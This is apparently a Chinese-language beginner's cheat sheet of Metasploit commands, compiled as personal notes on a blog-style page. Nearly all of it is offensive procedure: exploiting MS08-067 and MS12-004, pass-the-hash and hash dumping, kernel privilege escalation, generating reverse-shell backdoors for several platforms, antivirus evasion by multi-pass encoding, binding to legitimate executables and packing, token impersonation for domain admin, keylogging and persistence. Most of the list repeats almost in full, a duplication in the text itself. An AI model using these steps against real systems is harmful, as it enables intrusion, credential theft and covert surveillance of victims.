小白筆記-----------------------Metasploit (from tools)整理
1、msf更新
命令:./msfupdate
2、nmap掃描
命令:nmap命令
3、msf內置掃描
命令:search portscan
之後調用
show options 顯示設置參數
4、msf SMB獲取系統信息
命令:use auxiliary/scanner/smb/smb_version
5、msf服務識別
命令:ssh:
use auxiliary/scanner/ssh/ssh_version
ftp:
use auxiliary/scanner/ftp/ftp_version
6、密碼嗅探
命令: ftp密碼嗅探:
use auxiliary/sniffer/psnuffle
7、snmp掃描
命令:search snmp
use 其中一個
show options
完成設置
snmp枚舉:
use auxiliary/scanner/snmp/snmp_enum
8、SMB登陸驗證(microsoft 網絡共享協議)
命令:use auxiliary/scanner/smb/smb_lo
9、VNC身份識別(遠程控制)
命令:
use auxiliary/scanner/vnc/vnc_none_auths
10、wmap web掃描
命令:load wmap
wmap_sites
查看參數
wmap_sites -l
查看結果
wamp_targets -h
設置參數
wmap_targets -l
查看結果
wmap_run -h
wmap_run -t (進行掃描)
wmap_run -e (進行測試)
查看掃描結果
wmap_vulns -l
11、遠程代碼執行
漏洞:MS08_067
命令:search 08_067
use exploit/windows/smb/ms08_067_netapi
設置參數,選擇載荷
set paload reverse_tcp(非常常用的載荷)
設置目標版本號
set target
12、MIDI文件解析遠程代碼執行
漏洞:ms12_004
命令:use (調用一下)
show options
exploit (生成url)
set url(修改url)
讓對方訪問url
sessions(查看會話)
sessions -i 1(獲得會話)
13、口令安全
命令:search mysql_login(mysql 服務)
use
show options
set USERNAME
set PASS_FILE
search ssh_login(ssh 服務)
操作類似
14、Hash值傳遞參數
命令:在不知道密碼的情況下:
知道密碼的情況下;
use exploit/windows/smb/psexec
進行設置
exploit
hashdump(獲取hash值)
set smbpass +hash值(可以直接用hash值登陸)
15、NDProxy內核提權
命令:建立會話之後
search ms14_002
用這個漏洞提升自己的權限
set session 1
exploit 攻擊
16、多種後門生成
命令:主要是用payloads
msfpayload windows/meterpreter/reverse_tcp LHOST= **** LPORT=*** x
>/ ***.exe
生成了後門
將後門放到目標機器中
在msf中有一個監聽的程序
search handler
use exploit/multi/handler
show options
set payload 設置剛剛的payload windows/meterpreter/reverse_tcp
配置一下參數,設置端口和ip
在目標機子上運行後門,反彈一個shell
linux後門:
msfpayload linux/x86/shell_reverse_tcp LHOST=**
LPORT=*** x>linux
給他權限,
./linux
同時還要監聽相應的端口
生成java後門:
msfpayload java/meterpreter/reverse_tcp LHOST=** LPORT=**
w>123.jar
生成php後門:
msfpayload php/meterpreter/reverse_tcp LHOST=*** LPORT=**
R | msfencode -e php/base64 -t raw -o 1.php
生成android後門:
msfpayload android/meterpreter/reverse_tcp LHOST=*8 LPORT=**
R>1.apk
17、內網滲透
命令:獲得shell
掃描c段
run get_local_subnets
查看域環境
use incognito
list_tokens -u
impersonate_token (獲得域管理的權限)
shell(進入域管理shell)
如果沒有域管理
18、反反病毒(免殺)
1、加殼
2、用匯編的方法改變
命令: 先生成後門
msfpayload windows/shell/reverese_tcp LHOST=** LPORT=**
R | msfencode -e x86/shikata_ga_nai -t exe >123.exe
用編碼的方式來免殺
調用多個編碼進行多次免殺
msfencode -L(查看可用編碼,有的編碼可以重複使用)
msfpayload windows/meterprter/reverse_tcp LHOST=** LPORT=**
R | msfencode -e x86/shikata_ga_nai -c 10 -t exe>123.exe
綁定正常文件
msfpayload windows/shell/reverese_tcp LHOST=** LPORT=**
R | msfencode -e x86/shikata_ga_nai -t exe -x /root/ftp.exe -o 123.exe
加殼
upx - 5 /123.exe
19、XSS
命令: search keylogger
use 其中一個
set DEMO true
set URLPATH
set srvport
20、維持訪問(後門)
命令: 有一個會話
run metsvc -A
use exploit/multi/handler
set payload windows/metsvc_bind_tcp
實現主動連接
keyscan_start (鍵盤記錄)
keyscan_dump
命令:./msfupdate
2、nmap掃描
命令:nmap命令
3、msf內置掃描
命令:search portscan
之後調用
show options 顯示設置參數
4、msf SMB獲取系統信息
命令:use auxiliary/scanner/smb/smb_version
5、msf服務識別
命令:ssh:
use auxiliary/scanner/ssh/ssh_version
ftp:
use auxiliary/scanner/ftp/ftp_version
6、密碼嗅探
命令: ftp密碼嗅探:
use auxiliary/sniffer/psnuffle
7、snmp掃描
命令:search snmp
use 其中一個
show options
完成設置
snmp枚舉:
use auxiliary/scanner/snmp/snmp_enum
8、SMB登陸驗證(microsoft 網絡共享協議)
命令:use auxiliary/scanner/smb/smb_lo
9、VNC身份識別(遠程控制)
命令:
use auxiliary/scanner/vnc/vnc_none_auths
10、wmap web掃描
命令:load wmap
wmap_sites
查看參數
wmap_sites -l
查看結果
wamp_targets -h
設置參數
wmap_targets -l
查看結果
wmap_run -h
wmap_run -t (進行掃描)
wmap_run -e (進行測試)
查看掃描結果
wmap_vulns -l
11、遠程代碼執行
漏洞:MS08_067
命令:search 08_067
use exploit/windows/smb/ms08_067_netapi
設置參數,選擇載荷
set paload reverse_tcp(非常常用的載荷)
設置目標版本號
set target
12、MIDI文件解析遠程代碼執行
漏洞:ms12_004
命令:use (調用一下)
show options
exploit (生成url)
set url(修改url)
讓對方訪問url
sessions(查看會話)
sessions -i 1(獲得會話)
13、口令安全
命令:search mysql_login(mysql 服務)
use
show options
set USERNAME
set PASS_FILE
search ssh_login(ssh 服務)
操作類似
14、Hash值傳遞參數
命令:在不知道密碼的情況下:
知道密碼的情況下;
use exploit/windows/smb/psexec
進行設置
exploit
hashdump(獲取hash值)
set smbpass +hash值(可以直接用hash值登陸)
15、NDProxy內核提權
命令:建立會話之後
search ms14_002
用這個漏洞提升自己的權限
set session 1
exploit 攻擊
16、多種後門生成
命令:主要是用payloads
msfpayload windows/meterpreter/reverse_tcp LHOST= **** LPORT=*** x
>/ ***.exe
生成了後門
將後門放到目標機器中
在msf中有一個監聽的程序
search handler
use exploit/multi/handler
show options
set payload 設置剛剛的payload windows/meterpreter/reverse_tcp
配置一下參數,設置端口和ip
在目標機子上運行後門,反彈一個shell
linux後門:
msfpayload linux/x86/shell_reverse_tcp LHOST=**
LPORT=*** x>linux
給他權限,
./linux
同時還要監聽相應的端口
生成java後門:
msfpayload java/meterpreter/reverse_tcp LHOST=** LPORT=**
w>123.jar
生成php後門:
msfpayload php/meterpreter/reverse_tcp LHOST=*** LPORT=**
R | msfencode -e php/base64 -t raw -o 1.php
生成android後門:
msfpayload android/meterpreter/reverse_tcp LHOST=*8 LPORT=**
R>1.apk
17、內網滲透
命令:獲得shell
掃描c段
run get_local_subnets
查看域環境
use incognito
list_tokens -u
impersonate_token (獲得域管理的權限)
shell(進入域管理shell)
如果沒有域管理
18、反反病毒(免殺)
1、加殼
2、用匯編的方法改變
命令: 先生成後門
msfpayload windows/shell/reverese_tcp LHOST=** LPORT=**
R | msfencode -e x86/shikata_ga_nai -t exe >123.exe
用編碼的方式來免殺
調用多個編碼進行多次免殺
msfencode -L(查看可用編碼,有的編碼可以重複使用)
msfpayload windows/meterprter/reverse_tcp LHOST=** LPORT=**
R | msfencode -e x86/shikata_ga_nai -c 10 -t exe>123.exe
綁定正常文件
msfpayload windows/shell/reverese_tcp LHOST=** LPORT=**
R | msfencode -e x86/shikata_ga_nai -t exe -x /root/ftp.exe -o 123.exe
加殼
upx - 5 /123.exe
19、XSS
命令: search keylogger
use 其中一個
set DEMO true
set URLPATH
set srvport
20、維持訪問(後門)
命令: 有一個會話
run metsvc -A
use exploit/multi/handler
set payload windows/metsvc_bind_tcp
實現主動連接
keyscan_start (鍵盤記錄)
keyscan_dump
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.